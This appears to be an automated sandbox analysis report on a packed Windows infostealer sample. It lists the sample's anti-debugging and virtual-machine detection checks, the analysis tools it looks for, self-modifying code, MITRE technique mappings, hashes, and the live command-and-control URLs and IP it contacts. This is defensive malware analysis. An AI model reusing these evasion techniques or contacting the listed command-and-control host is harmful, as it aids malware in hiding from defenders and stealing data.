Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0D22 second address: 6EE0D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 mov edi, eax 0x0000000a jmp 00007FE100E17073h 0x0000000f test edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE100E1706Bh 0x0000001a sub cx, 415Eh 0x0000001f jmp 00007FE100E17079h 0x00000024 popfd 0x00000025 call 00007FE100E17070h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0D81 second address: 6EE0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0D87 second address: 6EE0D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Special instruction interceptor: First address: 859CBA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Special instruction interceptor: First address: 857276 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Special instruction interceptor: First address: A27DFB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Special instruction interceptor: First address: A8AB14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0015255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0015255D
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001529FF
Source: ivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ivHDHq51Ar.exe | Binary or memory string: Hyper-V RAW
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: ivHDHq51Ar.exe, 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ivHDHq51Ar.exe, 00000000.00000003.1607628699.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607601890.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1511961128.0000000001481000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1635897683.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1608081492.00000000014F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File opened: NTICE
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File opened: SICE
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Process queried: DebugPort
Source: ivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.9:49706 -> 176.53.146.223:80
MITRE ATT&CK matrix, listed by tactic (digits in parentheses are the count badges shown in the report for that technique, kept as extracted):
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (2), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (741), Virtualization/Sandbox Evasion (23), Process Discovery (13), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data (11), Data from Local System (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (4), Non-Application Layer Protocol (4), Application Layer Protocol (5), Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Source | Detection | Scanner | Label
ivHDHq51Ar.exe | 43% | Virustotal |
ivHDHq51Ar.exe | 55% | ReversingLabs | Win32.Infostealer.Tinba
ivHDHq51Ar.exe | 100% | Avira | TR/Crypt.TPM.Gen
ivHDHq51Ar.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17 | 0% | Avira URL Cloud | safe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5vs.top | 176.53.146.223 | true | true | | unknown
httpbin.org | 34.200.57.114 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://httpbin.org/ipbefore | ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | ivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl | ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html# | ivHDHq51Ar.exe | false | | high
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=000 | ivHDHq51Ar.exe, 00000000.00000002.1635378127.000000000144E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963 | ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17 | ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4 | ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
176.53.146.223 | home.fiveth5vs.top | United Kingdom | 35791 | VANNINVENTURESGB | true
34.200.57.114 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582697
Start date and time: 2024-12-31 09:44:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ivHDHq51Ar.exe (renamed because the original name is a hash value)
Original Sample Name: 27b03055c39daab2ce7ae0c5a369f0f1.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | Set-up.exe | malicious | Unknown | 52.202.253.164
httpbin.org | Set-up.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Set-up.exe | malicious | Unknown | 52.73.63.247
httpbin.org | a2mNMrPxow.exe | malicious | Unknown | 3.218.7.103
httpbin.org | SgMuuLxOCJ.exe | malicious | LummaC | 34.226.108.155
httpbin.org | TNyOrM6mIM.exe | malicious | LummaC | 3.218.7.103
httpbin.org | FIyDwZM4OR.exe | malicious | Unknown | 3.218.7.103
httpbin.org | ZFttiy4Tt8.exe | malicious | Unknown | 3.218.7.103
httpbin.org | e62iSl0abZ.exe | malicious | Unknown | 3.218.7.103
httpbin.org | HGFSqmKwd5.exe | malicious | Unknown | 34.226.108.155
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VANNINVENTURESGB | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 176.53.146.212
VANNINVENTURESGB | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 176.53.146.212
VANNINVENTURESGB | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | 176.53.146.212
VANNINVENTURESGB | s3hvuz3XS0.exe | malicious | Cryptbot | 176.53.146.212
VANNINVENTURESGB | 65AcuGF7W7.exe | malicious | Cryptbot | 176.53.146.212
VANNINVENTURESGB | 9nYVfFos77.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
VANNINVENTURESGB | ovQrwYAhbq.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
VANNINVENTURESGB | Sh2uIqqKqc.exe | malicious | Cryptbot | 176.53.146.212
VANNINVENTURESGB | W6seF0MjGW.exe | malicious | Clipboard Hijacker, Cryptbot | 176.53.146.212
VANNINVENTURESGB | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig | 176.53.146.212
AMAZON-AESUS | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105
AMAZON-AESUS | http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69
AMAZON-AESUS | Set-up.exe | malicious | Unknown | 52.202.253.164
AMAZON-AESUS | kwari.mips.elf | malicious | Unknown | 54.226.65.111
AMAZON-AESUS | Set-up.exe | malicious | Unknown | 34.197.122.172
AMAZON-AESUS | https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188 | malicious | KnowBe4 | 3.88.121.169
AMAZON-AESUS | https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857 | malicious | KnowBe4 | 3.88.121.169
AMAZON-AESUS | securedoc_20241220T111852.html | malicious | Unknown | 44.219.110.92
AMAZON-AESUS | https://visa-pwr.com/ | malicious | Unknown | 3.208.228.173
AMAZON-AESUS | botx.mips.elf | malicious | Mirai | 52.0.196.218
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.983154074641579
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ivHDHq51Ar.exe
File size: 4'514'816 bytes
MD5: 27b03055c39daab2ce7ae0c5a369f0f1
SHA1: 51c5eb4f2e29c659403437063502a061945265de
SHA256: f2d3aa2010aa17c79bd549f081efe1ef635b8e12ae150f200f8d2769b960bd4b
SHA512: c9054103e7798857acc2b6eea95c42c3152868cb1e6d40fafcf022139918fbc96839a613bc0287275a72da32bd43ca5c36ec47f3c00769015261e62ad95ad173
SSDEEP: 98304:NgKUrhtOfgod4ca/ljPU1uyUPL349JjFKLj74:NUteduljs1ubPL349Ujs
TLSH: C62633D6E08E0182DEC6993E3C93CBB2A22772D6587C4B19B94707F9A4D1F135D9CCA4
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..K...s..2...0........K...@..........................`.......XE...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x1063000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x677235C7 [Mon Dec 30 05:55:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After:
Subject Chain:
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:
                            Instruction
                            jmp 00007FE100E7CE2Ah
                            cmpps xmm0, dqword ptr [eax+eax+00h], 00h
                            add byte ptr [eax], al
                            jmp 00007FE100E7EE25h
                            add byte ptr [ebx], cl
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], ch
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            pop es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 00h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+00000000h], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x70505f | 0x73 | .idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x704000 | 0x1ac | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x730800 | 0x688 | 
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc61c14 | 0x10 | niwiuhuq
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_TLS | 0xc61bc4 | 0x18 | niwiuhuq
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            (unnamed) | 0x1000 | 0x703000 | 0x289a00 | 1eddf274c4db3a702307f418a8d4ae38 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc | 0x704000 | 0x1ac | 0x200 | 13b2d7f441cee794c0f633eedbd6e7dd | False | 0.58203125 | data | 4.557533997106786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0x705000 | 0x1000 | 0x200 | 0ff3b278c147647c2093aaa19ab35725 | False | 0.166015625 | data | 1.1569718486953509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            (unnamed) | 0x706000 | 0x39b000 | 0x200 | 714161558ecbc698a2ef88767fd185fc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            niwiuhuq | 0xaa1000 | 0x1c1000 | 0x1c0e00 | 74fd9df8bc1a83d3924014a21482134b | False | 0.9945142804928989 | data | 7.9555945069961025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            akfmfqsl | 0xc62000 | 0x1000 | 0x400 | 5a03b057ec162a334fc53fdf9bdff1a8 | False | 0.8173828125 | data | 6.349329576151624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant | 0xc63000 | 0x3000 | 0x2200 | 17ae9c30e031c6a26d76130b99c9a08b | False | 0.06307444852941177 | DOS executable (COM) | 0.824433894033823 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_MANIFEST | 0xc61c24 | 0x152 | ASCII text, with CRLF line terminators |  |  | 0.6479289940828402
                            DLL | Import
                            kernel32.dll | lstrcpy
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Dec 31, 2024 09:45:22.212673903 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
                            Dec 31, 2024 09:45:22.212728977 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
                            Dec 31, 2024 09:45:22.212829113 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
